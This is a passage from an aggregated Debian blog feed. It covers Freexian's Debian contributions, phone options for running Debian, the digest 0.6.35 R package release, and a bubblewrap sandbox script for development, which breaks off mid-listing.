<li><a href="https://etbe.coker.com.au/2009/10/18/mobile-phones-are-computers/" rel="bookmark" title="Mobile Phones Are Computers">Mobile Phones Are Computers</a> <small>One thing I noticed when I got my new LG...</small></li>
</ol>
</div>2024-03-13T12:16:01+00:00etbeFreexian Collaborators: Debian Contributions: Upcoming Improvements to Salsa CI, /usr-move, packaging simplemonitor, and more! (by Utkarsh Gupta)
https://www.freexian.com/blog/debian-contributions-02-2024/
<p><a href="https://www.freexian.com/about/debian-contributions/">Contributing to Debian</a>
is part of <a href="https://www.freexian.com/about/">Freexian’s mission</a>. This article
covers the latest achievements of Freexian and their collaborators. All of this
is made possible by organizations subscribing to our
<a href="https://www.freexian.com/lts/">Long Term Support contracts</a> and
<a href="https://www.freexian.com/services/">consulting services</a>.</p>
<h2 id="usr-move-by-helmut-grohne">/usr-move, by Helmut Grohne</h2>
<p>Much of the work was spent on handling the interaction with the time64 transition
and sending patches to mitigate fallout. The set of packages relevant to
<code>debootstrap</code> is mostly converted and the patches for <code>glibc</code> and <code>base-files</code>
have been refined due to feedback from the upload to Ubuntu noble. Beyond this,
he sent patches for all remaining packages that cannot move their files with
<code>dh-sequence-movetousr</code> and packages using <code>dpkg-divert</code> in ways that <code>dumat</code>
would not recognize.</p>
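<p>For packages that can use it, opting into that debhelper sequence is typically a one-line change to <code>debian/control</code> (the source package name here is illustrative, not from any specific upload):</p>
<pre><code>Source: example
Build-Depends: debhelper-compat (= 13),
               dh-sequence-movetousr,
</code></pre>
<p>With the sequence in the build dependencies, debhelper moves files the package installs into aliased locations such as <code>/bin</code>, <code>/sbin</code> and <code>/lib</code> to their <code>/usr</code> counterparts at build time.</p>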
<h2 id="upcoming-improvements-to-salsa-ci-by-santiago-ruano-rincón">Upcoming improvements to Salsa CI, by Santiago Ruano Rincón</h2>
<p>Last month, Santiago Ruano Rincón started working on integrating sbuild into
the Salsa CI pipeline. Initially, Santiago used sbuild with the <code>unshare</code>
chroot mode. However, after discussion with josch, jochensp and helmut (thanks
to them!), it turns out that the unshare mode is not the most suitable for the
pipeline, since the level of isolation it provides is not needed and some test
suites would fail (e.g. krb5). Additionally, one of the requirements of the
build job is the use of ccache, since some large C/C++ projects need it
to reduce compilation time. In the preliminary work with unshare last
month, it was not possible to make ccache work.</p>
<p>Finally, Santiago changed the chroot mode, and now has a couple of POCs (cf:
<a href="https://salsa.debian.org/santiago/pipeline/-/tree/sbuild-schroot?ref_type=heads">1</a>
and <a href="https://salsa.debian.org/santiago/pipeline/-/commits/sbuild-sudo">2</a>)
that rely on <code>schroot</code> and <code>sudo</code>, respectively. And the good news is that
ccache is successfully used by sbuild with schroot!</p>
<img src="https://www.freexian.com/images/debian-funding-february-salsaci.png" style="float: right;" />
<p>The image here comes from an example of building <code>grep</code>. At the end of the
build, <code>ccache -s</code> shows the statistics of the cache it used: a
little more than half of the calls in that job were cacheable. The most
important pieces are in place to finish the integration of sbuild into the
pipeline.</p>
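<p>As a rough sketch of what the two chroot modes look like on the command line (the package and distribution here are illustrative; the pipeline wires this into CI jobs rather than manual invocations):</p>
<pre><code># unshare mode: needs no root or pre-configured chroot,
# but isolates more than the pipeline needs
sbuild --chroot-mode=unshare --dist=unstable hello_2.10-3.dsc

# schroot mode: needs a configured schroot, but ccache works with it
sbuild --chroot-mode=schroot --dist=unstable hello_2.10-3.dsc

# after a build, inspect how effective the cache was
ccache -s
</code></pre>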
<p>Other than that, Santiago also reviewed the very useful
<a href="https://salsa.debian.org/salsa-ci-team/pipeline/-/merge_requests/346">merge request !346</a>,
made by IOhannes zmölnig to autodetect the release from debian/changelog. As
agreed with IOhannes, Santiago is preparing a merge request to include the
release autodetection use case in Salsa CI’s own CI.</p>
<h2 id="packaging-simplemonitor-by-carles-pina-i-estany">Packaging simplemonitor, by Carles Pina i Estany</h2>
<p>Carles started using <a href="https://simplemonitor.readthedocs.io/">simplemonitor</a> in
2017, opened a
<a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016113">WNPP bug</a> in 2022
and started packaging simplemonitor dependencies in October 2023. After
packaging five direct and indirect dependencies, Carles finally uploaded
simplemonitor to unstable in February.</p>
<p>During the packaging of simplemonitor, Carles reported
<a href="https://github.com/jamesoff/simplemonitor/issues?q=is%3Aissue+author%3Acpina+created%3A2024-01-01..2024-03-01">a few issues</a>
to upstream. Some of these were to make the simplemonitor package build and run
tests reproducibly. One such issue was reprotest overriding the
timezone, which broke simplemonitor’s tests. There have been discussions on
resolving this upstream in simplemonitor and
<a href="https://salsa.debian.org/reproducible-builds/reprotest/-/issues/11">in reprotest</a>,
too.</p>
<p>Carles also started upgrading or improving some of simplemonitor’s dependencies.</p>
<h2 id="miscellaneous-contributions">Miscellaneous contributions</h2>
<ul>
<li>Stefano Rivera spent some time doing admin on debian.social infrastructure,
including dealing with a spike of abuse on the Jitsi server.</li>
<li>Stefano started to prepare a new release of dh-python, including cleaning out
a lot of old Python 2.x related code. Thanks to Niels Thykier (outside
Freexian) for spear-heading this work.</li>
<li>DebConf 24 planning is beginning. Stefano discussed venues and finances with
the local team and remotely supported a site-visit by Nattie (outside
Freexian).</li>
<li>Also in the DebConf 24 context, Santiago took part in discussions and
preparations related to the Content Team.</li>
<li>A <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1062460">JIT bug</a> was
reported against pypy3 in Debian Bookworm. Stefano bisected the upstream
history to find the patch (it was already resolved upstream) and released an
update to pypy3 in bookworm.</li>
<li>Enrico participated in /usr-merge discussions with Helmut.</li>
<li>Colin Watson backported a
<a href="https://bugs.debian.org/1027387">python-channels-redis fix</a> to bookworm,
rediscovered while working on
<a href="https://freexian-team.pages.debian.net/debusine/">debusine</a>.</li>
<li>Colin dug into a cluster of celery build failures and tracked the hardest bit
down to a <a href="https://bugs.debian.org/1063345">Python 3.12 regression</a>, now
fixed in unstable. celery should be back in testing once the 64-bit time_t
migration is out of the way.</li>
<li>Thorsten Alteholz uploaded a new upstream version of cpdb-libs. Unfortunately
upstream changed the naming of their release tags, so updating the watch file
was a bit demanding. Anyway, version 2.0 is a huge step towards the
introduction of the new Common Print Dialog Backends.</li>
<li>Helmut sent patches for 48 cross build failures.</li>
<li>Helmut changed debvm to use mkfs.ext4 instead of genext2fs.</li>
<li>Helmut sent a
<a href="https://salsa.debian.org/ci-team/debci/-/merge_requests/271">debci MR</a>
for improving collector robustness.</li>
<li>In preparation for DebConf 25, Santiago worked on the Brest Bid.</li>
</ul>2024-03-13T00:00:00+00:00Utkarsh GuptaRussell Coker: Android vs FOSS Phones
https://etbe.coker.com.au/2024/03/12/android-vs-foss-phones/
<p>To achieve my aims regarding <a href="https://etbe.coker.com.au/2023/05/29/considering-convergence/">Convergence of mobile phone and PC [1]</a> I need something a bit bigger than the 4G of RAM that’s in the <a href="https://en.wikipedia.org/wiki/PinePhone_Pro">PinePhone Pro [2]</a>. The PinePhonePro was released at the end of 2021 but has a SoC that was first released in 2016. That SoC seems to compare well to the ones used in the Pixel and Pixel 2 phones that were released in the same time period so it’s not a bad SoC, but it doesn’t compare well to more recent Android devices and it also isn’t a great fit for the non-Android things I want to do. Also the PinePhonePro and Librem5 have relatively short battery life, so reusing Android functionality for power saving could provide a real benefit. So I want a phone designed for the mass market that I can use for running Debian.</p>
<h2>PostmarketOS</h2>
<p>One thing I’m definitely not going to do is attempt a full port of Linux to a different platform or maintain kernel support myself. So I need to choose a device that already has support from a somewhat free Linux system. The PostmarketOS system is the first I considered; the <a href="https://wiki.postmarketos.org/wiki/Devices">PostmarketOS Wiki page of supported devices [3]</a> was the first place I looked. The “main” supported devices are the PinePhone (not Pro) and the Librem5, both of which are under-powered. For the “community” devices there seems to be nothing that supports calls, SMS, mobile data, and USB-OTG and which also has 4G of RAM or more. If I skip USB-OTG (which presumably means I’d have to get dock functionality via wifi – not impossible but not great) then I’m left with the SHIFT6mq which was never sold in Australia and the Xiaomi POCO F1 which doesn’t appear to be available on ebay.</p>
<h2>LineageOS</h2>
<p>The <a href="https://en.wikipedia.org/wiki/Libhybris">libhybris libraries are a compatibility layer between Android and glibc programs [4]</a>; this includes running Wayland with Android display drivers. So running a somewhat standard Linux desktop on top of an Android kernel should be possible. Here is a table of the LineageOS supported devices that seem to have a useful feature set, are available in Australia, and could be used for running Debian with firmware and drivers copied from Android. I only checked LineageOS as it seems to be the main free Android build.</p>
<table>
<tbody><tr>
<th>Phone</th>
<th>RAM</th>
<th>External Display</th>
<th>Price</th>
</tr>
<tr>
<td><a href="https://wiki.lineageos.org/devices/pstar/">Edge 20 Pro [5]</a></td>
<td>6-12G</td>
<td>HDMI</td>
<td>$500 not many on sale</td>
</tr>
<tr>
<td><a href="https://wiki.lineageos.org/devices/nio/variant1/">Edge S aka moto G100 [6]</a></td>
<td>6-8G</td>
<td>HDMI</td>
<td>$500 to $600+</td>
</tr>
<tr>
<td><a href="https://wiki.lineageos.org/devices/FP4/">Fairphone 4</a></td>
<td>6-8G</td>
<td>USBC-DP</td>
<td>$1000+</td>
</tr>
<tr>
<td><a href="https://wiki.lineageos.org/devices/nx659j/variant1/">Nubia Red Magic 5G</a></td>
<td>8-16G</td>
<td>USBC-DP</td>
<td>$600+</td>
</tr>
</tbody></table>
<p>The <a href="https://wiki.lineageos.org/devices/">LineageOS device search page [9]</a> allows searching by kernel version. There are no phones with a 6.6 (2023) or 6.1 (2022) Linux kernel and only the Pixel 8/8Pro and the OnePlus 11 5G run 5.15 (2021). There are 8 Google devices (Pixel 6/7 and a tablet) running 5.10 (2020), 18 devices running 5.4 (2019), and 32 devices running 4.19 (2018). There are 186 devices running kernels older than 4.19 – which aren’t in the <a href="https://www.kernel.org/category/releases.html">kernel.org supported release list [10]</a>. The Pixel 8 Pro with 12G of RAM and the OnePlus 11 5G with 16G of RAM are appealing as portable desktop computers, until recently my main laptop had 8G of RAM. But they cost over $1000 second hand compared to $359 for my latest laptop.</p>
<p><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3362-open-source-for-sustainable-and-long-lasting-phones/">Fosdem had an interesting lecture from two Fairphone employees about what they are doing to make phone production fairer for workers and less harmful for the environment [11]</a>. But they don’t have the market power that companies like Google have to tell SoC vendors what they want.</p>
<h2>IP Laws and Practices</h2>
<p><a href="https://www.bunniestudios.com/blog/?p=4297">Bunnie wrote an insightful and informative blog post about the difference between intellectual property practices in China and US influenced countries and his efforts to reverse engineer a commonly used Chinese SoC [12]</a>. This is a major factor in the lack of support for FOSS on phones and other devices.</p>
<h2>Droidian and Buying a Note 9</h2>
<p>FOSDEM 2024 had <a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3165-droidian-bridging-the-gap-between-various-platforms-with-convergence/">a lecture about the Droidian project, which runs Debian with firmware and drivers from Android to make a usable mostly-FOSS system [13]</a>. It’s interesting how they use containers for the necessary Android apps. Here is the <a href="https://devices.droidian.org/">list of devices supported by Droidian [14]</a>.</p>
<p>Two notable entries in the list of supported devices are the Volla Phone and Volla Phone 22 from <a href="https://volla.online/en/">Volla – a company dedicated to making open Android based devices [15]</a>. But they don’t seem to be available on ebay and the new price of the Volla Phone 22 is €452 ($AU750) which is more than I want to pay for a device that isn’t as open as the Pine64 and Purism products. The Volla Phone 22 only has 4G of RAM.</p>
<table>
<tbody><tr>
<th>Phone</th>
<th>RAM</th>
<th>Price</th>
<th>Issues</th>
</tr>
<tr>
<td>Note 9 128G/512G</td>
<td>6G/8G</td>
<td><$300</td>
<td>Not supporting external display</td>
</tr>
<tr>
<td>Galaxy S9+</td>
<td>6G</td>
<td><$300</td>
<td>Not supporting external display</td>
</tr>
<tr>
<td>Xperia 5</td>
<td>6G</td>
<td>>$300</td>
<td>Hotspot partly working</td>
</tr>
<tr>
<td>OnePlus 3T</td>
<td>6G</td>
<td>$200 – $400+</td>
<td>photos not working</td>
</tr>
</tbody></table>
<p>I just bought a Note 9 with 128G of storage and 6G of RAM for $109 to try out Droidian; it has some screen burn but that’s OK for a test system and if I end up using it seriously I’ll just buy another that’s in as-new condition. With no support for an external display I’ll need to set up a software dock to do Convergence, but that’s not a serious problem. If I end up making a Note 9 with Droidian my daily driver then I’ll use the 512G/8G model for that and use the cheap one for testing.</p>
<h2>Mobian</h2>
<p>I should have checked the Mobian list first as it’s the main Debian variant for phones.</p>
<p>From the <a href="https://wiki.debian.org/Mobian/Devices">Mobian Devices list [16]</a> the OnePlus 6T has 8G of RAM or more but isn’t available in Australia and costs more than $400 when imported. The PocoPhone F1 doesn’t seem to be available on ebay. The <a href="https://shop.shiftphones.com/shift6mq.html">Shift6mq is made by a German company with similar aims to the Fairphone [17]</a>, it looks nice but costs €577 which is more than I want to spend and isn’t on the officially supported list.</p>
<h2>Smart Watches</h2>
<p>The same issues apply to smart watches. <a href="https://asteroidos.org/watches/">AsteroidOS is a free smart watch OS designed for closed hardware [18]</a>. I don’t have time to get involved in this sort of thing though; I can’t hack on every device I use.</p>
<ul>
<li>[1]<a href="https://etbe.coker.com.au/2023/05/29/considering-convergence/"> https://etbe.coker.com.au/2023/05/29/considering-convergence/</a></li>
<li>[2]<a href="https://en.wikipedia.org/wiki/PinePhone_Pro"> https://en.wikipedia.org/wiki/PinePhone_Pro</a></li>
<li>[3]<a href="https://wiki.postmarketos.org/wiki/Devices"> https://wiki.postmarketos.org/wiki/Devices</a></li>
<li>[4]<a href="https://en.wikipedia.org/wiki/Libhybris"> https://en.wikipedia.org/wiki/Libhybris</a></li>
<li>[5]<a href="https://wiki.lineageos.org/devices/pstar/"> https://wiki.lineageos.org/devices/pstar/</a></li>
<li>[6]<a href="https://wiki.lineageos.org/devices/nio/variant1/"> https://wiki.lineageos.org/devices/nio/variant1/</a></li>
<li>[7]<a href="https://wiki.lineageos.org/devices/FP4/"> https://wiki.lineageos.org/devices/FP4/</a></li>
<li>[8]<a href="https://wiki.lineageos.org/devices/nx659j/variant1/"> https://wiki.lineageos.org/devices/nx659j/variant1/</a></li>
<li>[9]<a href="https://wiki.lineageos.org/devices/"> https://wiki.lineageos.org/devices/</a></li>
<li>[10]<a href="https://www.kernel.org/category/releases.html"> https://www.kernel.org/category/releases.html</a></li>
<li>[11]<a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3362-open-source-for-sustainable-and-long-lasting-phones/"> https://tinyurl.com/ykdbxf4a</a></li>
<li>[12]<a href="https://www.bunniestudios.com/blog/?p=4297"> https://www.bunniestudios.com/blog/?p=4297</a></li>
<li>[13]<a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3165-droidian-bridging-the-gap-between-various-platforms-with-convergence/"> https://tinyurl.com/29jfaw4f</a></li>
<li>[14]<a href="https://devices.droidian.org/"> https://devices.droidian.org/</a></li>
<li>[15]<a href="https://volla.online/en/"> https://volla.online/en/</a></li>
<li>[16]<a href="https://wiki.debian.org/Mobian/Devices"> https://wiki.debian.org/Mobian/Devices</a></li>
<li>[17]<a href="https://shop.shiftphones.com/shift6mq.html"> https://shop.shiftphones.com/shift6mq.html</a></li>
<li>[18]<a href="https://asteroidos.org/watches/"> https://asteroidos.org/watches/</a></li>
</ul>
<div class="yarpp yarpp-related yarpp-related-rss yarpp-template-list">
<p>Related posts:</p><ol>
<li><a href="https://etbe.coker.com.au/2010/01/27/australian-open-android-seer/" rel="bookmark" title="The Australian Open and Android Phones (Seer)">The Australian Open and Android Phones (Seer)</a> <small>On Monday the 25th of January 2010 I visited the...</small></li>
<li><a href="https://etbe.coker.com.au/2011/10/27/dual-sim-amaysim-contract/" rel="bookmark" title="Dual SIM Phones vs Amaysim vs Contract for Mobile Phones">Dual SIM Phones vs Amaysim vs Contract for Mobile Phones</a> <small>Currently Dick Smith is offering two dual-SIM mobile phones for...</small></li>
<li><a href="https://etbe.coker.com.au/2022/12/15/pixel-6a/" rel="bookmark" title="Pixel 6A">Pixel 6A</a> <small>I have just bought a Pixel 6A [1] for my...</small></li>
</ol>
</div>2024-03-12T10:35:41+00:00etbeDirk Eddelbuettel: digest 0.6.35 on CRAN: New xxhash code
http://dirk.eddelbuettel.com/blog/2024/03/11#digest_0.6.35
<p>Release 0.6.35 of the <a href="https://dirk.eddelbuettel.com/code/digest.html">digest</a> package
arrived at <a href="https://cran.r-project.org">CRAN</a> today and has
also been uploaded to <a href="https://www.debian.org">Debian</a>
already.</p>
<p><a href="https://dirk.eddelbuettel.com/code/digest.html">digest</a>
creates hash digests of arbitrary R objects. It can use a number of
different hashing algorithms (<code>md5</code>, <code>sha-1</code>,
<code>sha-256</code>, <code>sha-512</code>, <code>crc32</code>,
<code>xxhash32</code>, <code>xxhash64</code>, <code>murmur32</code>,
<code>spookyhash</code>, <code>blake3</code>, <code>crc32c</code> – and
now also <code>xxh3_64</code> and <code>xxh3_128</code>), and enables
easy comparison of (potentially large and nested) R language objects as
it relies on the native serialization in R. It is a mature and
widely-used package (with 65.8 million downloads just on the partial
cloud mirrors of CRAN which keep logs) as many tasks may involve
<em>caching</em> of objects for which it provides convenient
general-purpose hash key generation to quickly identify the various
objects.</p>
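<p>A minimal usage sketch, invoked from the shell here (the hashed objects are illustrative):</p>
<pre><code>Rscript -e 'library(digest); cat(digest(mtcars, algo = "xxh3_128"), "\n")'
Rscript -e 'library(digest); cat(digest("hello", algo = "xxh3_64", serialize = FALSE), "\n")'
</code></pre>
<p>The first call serializes an arbitrary R object before hashing; the second hashes the raw string directly.</p>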
<p>This release updates the included <a href="https://github.com/Cyan4973/xxHash">xxHash</a> version to the
current version 0.8.2, updating the existing <code>xxhash32</code> and
<code>xxhash64</code> hash functions — and also adding the newer
<code>xxh3_64</code> and <code>xxh3_128</code> ones. We have a project
at work using <code>xxh3_128</code> from Python which made me realize
having it from R would be nice too, and given the existing
infrastructure in the package actually doing so was fairly quick and
straightforward.</p>
<p>My <a href="https://dirk.eddelbuettel.com/cranberries/">CRANberries</a>
provides a summary of changes to the <a href="https://dirk.eddelbuettel.com/cranberries/2024/03/11/#digest_0.6.35">previous
version</a>. For questions or comments use the <a href="https://github.com/eddelbuettel/digest/issues">issue tracker</a>
off the <a href="https://github.com/eddelbuettel/digest">GitHub
repo</a>. For documentation (including the <a href="https://eddelbuettel.github.io/digest/changelog/">changelog</a>)
see the <a href="https://eddelbuettel.github.io/digest/">documentation
site</a>.</p>
<p>If you like this or other open-source work I do, you can now <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>2024-03-11T23:23:00+00:00Dirk EddelbuettelJoachim Breitner: Convenient sandboxed development environment
https://www.joachim-breitner.de/blog/812-Convenient_sandboxed_development_environment
<p>I like using one machine and setup for everything, from serious development work to hobby projects to managing my finances. This is very convenient, as often the lines between these are blurred. But it is also scary if I think of the large number of people who I have to trust to not want to extract all my personal data. Whenever I run a <code>cabal install</code>, or a fun VSCode extension gets updated, or anything like that, I am running code that could be malicious or buggy.</p>
<p>In a way it is surprising and reassuring that, as far as I can tell, this commonly does not happen. Most open source developers out there seem to be nice and well-meaning, after all.</p>
<h3 id="convenient-or-it-wont-happen">Convenient or it won’t happen</h3>
<p>Nevertheless I thought I should do something about this. The safest option would probably be to use dedicated virtual machines for the development work, with very little interaction with my main system. But knowing me, that did not seem likely to happen, as it sounded like a fair amount of hassle. So I aimed for a viable compromise between security and convenience, one that does not get too much in the way of my current habits.</p>
<p>For instance, it seems desirable to have the project files accessible from my unconstrained environment. This way, I could perform certain actions that need access to secret keys or tokens, but are unlikely to run code (e.g. <code>git push</code>, <code>git pull</code> from private repositories, <code>gh pr create</code>), from “the outside”, and the actual build environment can do without access to these secrets.</p>
<p>The user experience I thus want is a quick way to enter a “development environment” where I can do most of the things I need to do while programming (network access, running command line and GUI programs), with access to the current project, but without access to my actual <code>/home</code> directory.</p>
<p>I initially followed the blog post <a href="https://msucharski.eu/posts/application-isolation-nixos-containers/">“Application Isolation using NixOS Containers” by Marcin Sucharski</a> and got something working that mostly did what I wanted, but then a colleague pointed out that tools like <a href="https://github.com/netblue30/firejail"><code>firejail</code></a> can achieve roughly the same with a less “global” setup. I tried to use <code>firejail</code>, but found it to be a bit too inflexible for my particular whims, so I ended up writing a small wrapper around the lower level sandboxing tool <a href="https://www.joachim-breitner.de/blog/tag/Bubblewrap">https://github.com/containers/bubblewrap</a>.</p>
<h3 id="selective-bubblewrapping">Selective bubblewrapping</h3>
<p>This script, called <code>dev</code> and included below, builds a new filesystem namespace with minimal <code>/proc</code> and <code>/dev</code> directories and its own <code>/tmp</code> directory. It then bind-mounts some directories to make the host’s NixOS system available inside the container (<code>/bin</code>, <code>/usr</code>, the nix store including its daemon socket, stuff for OpenGL applications). My user’s home directory is taken from <code>~/.dev-home</code> and some configuration files are bind-mounted for convenient sharing. I intentionally don’t share most of the configuration – for example, a <code>direnv enable</code> in the dev environment should not affect the main environment. The X11 socket for graphical applications and the corresponding <code>.Xauthority</code> file are made available. And finally, if I run <code>dev</code> in a project directory, this project directory is bind-mounted writable, and the current working directory is preserved.</p>
<p>The effect is that I can type <code>dev</code> on the command line to enter “dev mode” rather conveniently. I can run development tools, including graphical ones like VSCode, and importantly the latter with its extensions stays inside the sandbox. To do a <code>git push</code> I either exit the development environment (Ctrl-D) or open a separate terminal. Overall, the inconvenience of switching back and forth seems worth the extra protection.</p>
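<p>Stripped to its essentials, this kind of wrapper boils down to a single <code>bwrap</code> invocation; the following is a minimal sketch with illustrative paths, not the exact script:</p>
<pre><code># fresh /proc, /dev and /tmp; host system read-only; project writable
bwrap \
  --proc /proc --dev /dev --tmpfs /tmp \
  --ro-bind /bin /bin --ro-bind /usr /usr --ro-bind /nix /nix \
  --bind ~/.dev-home "$HOME" \
  --bind "$PWD" "$PWD" --chdir "$PWD" \
  bash
</code></pre>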
<p>Clearly, this isn’t going to hold against a determined and maybe targeted attacker (e.g. access to the X11 and nix daemon sockets can probably be used to escape easily). But I hope it will help against a compromised dev dependency that just deletes or exfiltrates data, like keys or passwords, from the usual places in <code>$HOME</code>.</p>
<h3 id="rough-corners">Rough corners</h3>
<p>There is more polishing that could be done.</p>
<ul>
<li><p>In particular, clicking on a link inside VSCode in the container will currently open Firefox inside the container, without access to my settings and cookies etc. Ideally, links would be opened in the Firefox running outside. This is a problem that has a solution in the world of applications that are sandboxed with Flatpak, and involves a bunch of moving parts (a <a href="https://github.com/flatpak/xdg-desktop-portal">xdg-desktop-portal</a> user service, a <a href="https://github.com/flatpak/xdg-dbus-proxy">filtering dbus proxy</a>, exposing access to that proxy in the container). I experimented with that for a bit longer than I should have, but could not get it to work to satisfaction (even without a container involved, I could not get <code>xdg-desktop-portal</code> to heed my default browser settings…). For now I will live with manually copying and pasting URLs, we’ll see how long this lasts.</p></li>
<li><p>With this setup (and unlike the NixOS container setup I tried first), the same applications are installed inside and outside. It might be useful to separate the set of installed programs: there is simply no point in running <code>evolution</code> or <code>firefox</code> inside the container, and if I do not even have VSCode or <code>cabal</code> available outside, it’s less likely that I forget to enter <code>dev</code> before using these tools.</p>
<p>It shouldn’t be too hard to cargo-cult some of the NixOS Containers infrastructure to be able to have a separate system configuration that I can manage as part of my normal system configuration and make available to <code>bubblewrap</code> here.</p></li>
</ul>
<p>So likely I will refine this some more over time. Or I will get tired of typing <code>dev</code> and go back to what I did before…</p>
<h3 id="the-script">The script</h3>
<details>
The <code>dev</code> script (at the time of writing)
<div class="sourceCode" id="cb1"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb1-1"><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-1" tabindex="-1"><span class="co">#!/usr/bin/env bash</span></a></span><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-1" tabindex="-1">
<span id="cb1-2"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-2" tabindex="-1">
<span id="cb1-3"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-3" tabindex="-1"><span class="va">extra</span><span class="op">=</span><span class="va">()</span>
<span id="cb1-4"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-4" tabindex="-1"><span class="cf">if</span> <span class="kw">[[</span> <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span> <span class="ot">==</span> /home/jojo/build/<span class="pp">*</span> <span class="kw">]]</span> <span class="kw">||</span> <span class="kw">[[</span> <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span> <span class="ot">==</span> /home/jojo/projekte/programming/<span class="pp">*</span> <span class="kw">]]</span>
<span id="cb1-5"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-5" tabindex="-1"><span class="cf">then</span>
<span id="cb1-6"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-6" tabindex="-1"><span class="va">extra</span><span class="op">+=</span><span class="va">(</span>--bind <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span> <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span> --chdir <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span><span class="va">)</span>
<span id="cb1-7"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-7" tabindex="-1"><span class="cf">fi</span>
<span id="cb1-8"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-8" tabindex="-1">
<span id="cb1-9"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-9" tabindex="-1"><span class="cf">if</span> <span class="bu">[</span> <span class="ot">-n</span> <span class="st">"</span><span class="va">$1</span><span class="st">"</span> <span class="bu">]</span>
<span id="cb1-10"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-10" tabindex="-1"><span class="cf">then</span>
<span id="cb1-11"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-11" tabindex="-1"> <span class="va">cmd</span><span class="op">=</span><span class="va">(</span> <span class="st">"</span><span class="va">$@</span><span class="st">"</span> <span class="va">)</span>
<span id="cb1-12"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-12" tabindex="-1"><span class="cf">else</span>
<span id="cb1-13"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-13" tabindex="-1"> <span class="va">cmd</span><span class="op">=</span><span class="va">(</span> bash <span class="va">)</span>
<span id="cb1-14"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-14" tabindex="-1"><span class="cf">fi</span>
<span id="cb1-15"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-15" tabindex="-1">
<span id="cb1-16"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-16" tabindex="-1"><span class="co"># Caveats:</span>
<span id="cb1-17"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-17" tabindex="-1"><span class="co"># * access to all of `/etc`</span>
<span id="cb1-18"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-18" tabindex="-1"><span class="co"># * access to `/nix/var/nix/daemon-socket/socket`, and is trusted user (but needed to run nix)</span>
<span id="cb1-19"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-19" tabindex="-1"><span class="co"># * access to X11</span>
<span id="cb1-20"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-20" tabindex="-1">
<span id="cb1-21"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-21" tabindex="-1"><span class="bu">exec</span> bwrap <span class="dt">\</span>
<span id="cb1-22"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-22" tabindex="-1"> <span class="at">--unshare-all</span> <span class="dt">\</span>
<span id="cb1-23"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-23" tabindex="-1"><span class="dt">\</span>
<span id="cb1-24"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-24" tabindex="-1"><span class="kw">`</span><span class="co"># blank slate</span><span class="kw">`</span> <span class="dt">\</span>
<span id="cb1-25"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-25" tabindex="-1"> <span class="at">--share-net</span> <span class="dt">\</span>
<span id="cb1-26"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-26" tabindex="-1"> <span class="at">--proc</span> /proc <span class="dt">\</span>
<span id="cb1-27"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-27" tabindex="-1"> <span class="at">--dev</span> /dev <span class="dt">\</span>
<span id="cb1-28"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-28" tabindex="-1"> <span class="at">--tmpfs</span> /tmp <span class="dt">\</span>
<span id="cb1-29"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-29" tabindex="-1"> <span class="at">--tmpfs</span> /run/user/1000 <span class="dt">\</span>
<span id="cb1-30"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-30" tabindex="-1"><span class="dt">\</span>
<span id="cb1-31"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-31" tabindex="-1"><span class="kw">`</span><span class="co"># Needed for GLX applications, in particular alacritty</span><span class="kw">`</span> <span class="dt">\</span>
<span id="cb1-32"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-32" tabindex="-1"> <span class="at">--dev-bind</span> /dev/dri /dev/dri <span class="dt">\</span>
